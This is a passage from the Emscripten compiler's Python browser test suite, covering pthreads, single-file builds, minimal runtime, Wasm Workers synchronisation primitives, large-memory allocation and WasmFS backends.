['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM, and try again. It should still work with the Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
os.remove('test.wasm') # Also delete the Wasm file to check that no attempt is made to load it.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, which should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file into the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test with -std=c11, because EM_ASM requires gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 cast to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when there is a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
